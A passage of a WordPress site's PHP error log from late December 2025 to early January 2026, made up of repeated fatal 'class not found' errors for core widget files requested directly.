  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[18-Dec-2025 02:44:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[18-Dec-2025 13:24:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[18-Dec-2025 23:14:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[19-Dec-2025 16:55:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[19-Dec-2025 20:26:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[19-Dec-2025 20:29:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[20-Dec-2025 04:47:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[20-Dec-2025 05:02:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[20-Dec-2025 05:33:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[20-Dec-2025 10:40:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[20-Dec-2025 18:52:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[21-Dec-2025 09:49:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[21-Dec-2025 10:06:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[21-Dec-2025 18:12:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[21-Dec-2025 19:10:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[21-Dec-2025 21:16:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[22-Dec-2025 07:45:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[22-Dec-2025 13:07:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[23-Dec-2025 00:11:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[23-Dec-2025 00:20:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[23-Dec-2025 03:07:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[23-Dec-2025 08:58:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[23-Dec-2025 22:05:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[24-Dec-2025 01:12:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[24-Dec-2025 03:07:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[24-Dec-2025 08:52:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[24-Dec-2025 16:37:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[24-Dec-2025 19:54:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[25-Dec-2025 00:42:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[25-Dec-2025 05:03:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[25-Dec-2025 05:24:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[25-Dec-2025 06:57:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Dec-2025 11:59:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[25-Dec-2025 17:04:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[25-Dec-2025 21:31:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[26-Dec-2025 01:53:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[26-Dec-2025 02:19:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[27-Dec-2025 00:41:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[27-Dec-2025 00:42:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[27-Dec-2025 03:18:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[27-Dec-2025 18:38:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[28-Dec-2025 02:33:57 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[28-Dec-2025 03:32:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[28-Dec-2025 23:02:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[28-Dec-2025 23:47:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[29-Dec-2025 08:35:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[29-Dec-2025 09:54:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[29-Dec-2025 20:02:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[29-Dec-2025 20:19:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[30-Dec-2025 08:26:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[30-Dec-2025 18:28:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[30-Dec-2025 19:57:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[30-Dec-2025 21:02:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[30-Dec-2025 22:23:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[30-Dec-2025 22:26:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Dec-2025 23:13:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[31-Dec-2025 02:11:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[31-Dec-2025 02:26:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[31-Dec-2025 08:09:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[31-Dec-2025 16:00:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[31-Dec-2025 21:15:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[02-Jan-2026 05:14:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Jan-2026 06:22:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Jan-2026 06:31:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[02-Jan-2026 15:40:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[03-Jan-2026 10:39:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[03-Jan-2026 11:01:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[03-Jan-2026 16:15:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[03-Jan-2026 23:06:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Jan-2026 01:45:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[04-Jan-2026 02:59:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[04-Jan-2026 03:18:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[04-Jan-2026 03:55:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[04-Jan-2026 04:20:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[04-Jan-2026 05:50:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[04-Jan-2026 05:50:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[04-Jan-2026 05:51:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[04-Jan-2026 07:44:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[04-Jan-2026 07:44:22 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[04-Jan-2026 10:19:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[04-Jan-2026 10:55:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[04-Jan-2026 12:18:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[04-Jan-2026 12:36:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[04-Jan-2026 13:02:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[04-Jan-2026 13:36:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[04-Jan-2026 16:03:41 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[04-Jan-2026 17:09:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[04-Jan-2026 17:38:49 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Jan-2026 20:02:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[04-Jan-2026 21:27:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[04-Jan-2026 22:51:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[05-Jan-2026 03:48:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[05-Jan-2026 04:17:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[06-Jan-2026 00:58:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[06-Jan-2026 04:58:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[06-Jan-2026 05:14:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[06-Jan-2026 09:38:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
